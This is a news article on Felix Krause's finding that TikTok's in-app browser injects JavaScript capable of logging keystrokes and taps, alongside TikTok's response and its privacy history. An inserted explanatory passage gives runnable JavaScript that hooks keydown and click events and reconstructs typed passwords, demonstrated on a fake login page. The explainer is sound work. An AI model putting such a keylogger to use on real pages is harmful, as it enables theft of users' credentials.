Here's How TikTok Silently Monitors Your Web Activity

TikTok has mired itself in another controversy, one that puts it in the same infamous lane of surreptitiously tracking users across the web as rival platforms like Instagram and Facebook. According to an analysis by security researcher Felix Krause, the TikTok app's in-app web browser is capable of logging all keyboard input, potentially giving it access to sensitive information like login credentials, alongside a record of which websites users visit and what they do on those pages.

When you click a link while surfing the TikTok app, it opens inside a native web view that serves as TikTok's own basic web browser. Not every app does that. Take for example WhatsApp. When you click on a URL shared on the messaging app, it automatically opens it in the default web browser on your phone, which can be anything from Chrome to Safari. 

TikTok is not alone in offering a native browser experience, but there is something potentially nefarious embedded in the code. According to Krause, TikTok's in-app browser injects JavaScript into every website it loads, and that code can log every keystroke a user makes while on the page. That means every keyboard input, from messages to login credentials, can be recorded.

A hollow clarification

Keystroke logging is one of the most widely abused techniques for stealing sensitive information, which makes one wonder why a social media app like TikTok is using that kind of code in its in-app web browser. Aside from keystrokes, TikTok's in-app browser is also capable of recording every tap on the page. The app can record each image you click, each button you tap, and each URL you interact with inside the TikTok web browser.

All of that is done with custom JavaScript functions injected into the page. TikTok representatives have denied that the company tracks users, but they admit that the JavaScript code for the activities described above is indeed part of the in-app browser. However, the explanation for why those questionable features are bundled with its in-app web browser sounds rather odd.
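The mechanism described above, as an added example that is not part of the original article and is not TikTok's code or anything Krause published: a web view that injects JavaScript into a page gets the same view of keyboard and click events that the page's own scripts get, including characters typed into password fields. The `FakeDocument`, the event objects, the function names and the login sequence below are constructed so the example runs in Node without a browser; in a real web view the injected script would attach the same listeners to the real `document`.

```javascript
// Added example, not TikTok's code: a minimal model of what a web view can do
// once it injects JavaScript into every page it loads. FakeDocument, the event
// objects and the login session are constructed stand-ins so this runs in Node.

// Constructed stand-in for the document object of a page loaded in a web view.
class FakeDocument {
  constructor(url) {
    this.url = url;
    this.listeners = {};
  }
  addEventListener(type, fn) {
    (this.listeners[type] ??= []).push(fn);
  }
  // Deliver a constructed event to every listener registered for its type.
  dispatch(type, event) {
    for (const fn of this.listeners[type] ?? []) fn(event);
  }
}

// The injected part. A web view can run a script like this in the page's own
// context, so it sees every event the page sees. Input masking on a password
// field is only a display property; the keydown event still carries the key.
function installMonitor(doc) {
  const log = [];
  doc.addEventListener('keydown', (e) => {
    log.push({
      kind: 'keydown',
      url: doc.url,
      key: e.key,
      field: e.target.name,
      fieldType: e.target.type,
    });
  });
  doc.addEventListener('click', (e) => {
    log.push({ kind: 'click', url: doc.url, tag: e.target.tagName, text: e.target.textContent });
  });
  return log;
}

// What whoever receives the log can trivially do with it: reassemble what was
// typed into each password field on each page, honouring Backspace and
// ignoring non-printing keys such as Shift or Enter.
function reconstructSecrets(log) {
  const secrets = {};
  for (const entry of log) {
    if (entry.kind !== 'keydown' || entry.fieldType !== 'password') continue;
    const k = `${entry.url}#${entry.field}`;
    const current = secrets[k] ?? '';
    if (entry.key === 'Backspace') {
      secrets[k] = current.slice(0, -1);
    } else if (entry.key.length === 1) {
      secrets[k] = current + entry.key;
    }
  }
  return secrets;
}

// Constructed user session: a login page opened inside the in-app browser, the
// user types "hunter3", corrects the last character to "2", presses Enter and
// then taps the Sign in button.
function simulateLogin() {
  const doc = new FakeDocument('https://example.com/login');
  const log = installMonitor(doc);
  const pw = { tagName: 'INPUT', type: 'password', name: 'password' };
  for (const ch of 'hunter3') doc.dispatch('keydown', { key: ch, target: pw });
  doc.dispatch('keydown', { key: 'Backspace', target: pw });
  doc.dispatch('keydown', { key: '2', target: pw });
  doc.dispatch('keydown', { key: 'Enter', target: pw });
  doc.dispatch('click', {
    target: { tagName: 'BUTTON', type: 'submit', textContent: 'Sign in' },
  });
  return { log, secrets: reconstructSecrets(log) };
}

const session = simulateLogin();
console.log(session.secrets); // { 'https://example.com/login#password': 'hunter2' }
console.log(`${session.log.length} events captured from ${session.log[0].url}`);
```

Two things follow from this model. TLS does nothing for the user here, because the injected script runs inside the already-decrypted page, with the page's own privileges, and the website being visited has no reliable way to tell that its events are being observed. The only control the user has is the one WhatsApp exercises on their behalf: opening the link in the system browser, where the app that shared the link no longer has a script inside the page.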

In an official statement shared with Forbes, a TikTok spokesperson mentioned that the controversial JavaScript code is there for "debugging, troubleshooting and performance monitoring" of the web experience offered by the in-app browser. 

It is worth noting here that Krause doesn't claim to have found evidence that TikTok is abusing the feature to track users, nor proof that the captured data is shared with third parties. At the same time, as Krause told Forbes, "this does not happen by mistake or randomly."

Shaky history of privacy

Interestingly, of the seven apps tested in Krause's research project, TikTok was the only one found to be capable of logging keystrokes. TikTok also emerged as the app that monitors the widest range of user activity, more than Facebook, Instagram, Amazon, and Snapchat.

It's also difficult to take TikTok's statements at face value. A bombshell BuzzFeed investigation recently revealed that U.S. user data had been accessed from China, despite the company repeatedly claiming otherwise in the past. Following the BuzzFeed report, which cited leaked internal audio recordings, TikTok announced that it was moving all American user data to servers located on U.S. soil through a partnership with Oracle. TikTok is already banned in India over national security concerns and narrowly avoided a ban in the U.S. over similar concerns not too long ago.

In June 2022, FCC Commissioner Brendan Carr asked Google and Apple to remove TikTok from the Play Store and App Store, respectively, over security concerns stemming from its alleged ties with the Chinese government. Carr wrote in an open letter that sensitive user data was being accessed in China. Michael Beckerman, head of TikTok's public policy for the U.S. market, denied those claims in a CNN interview.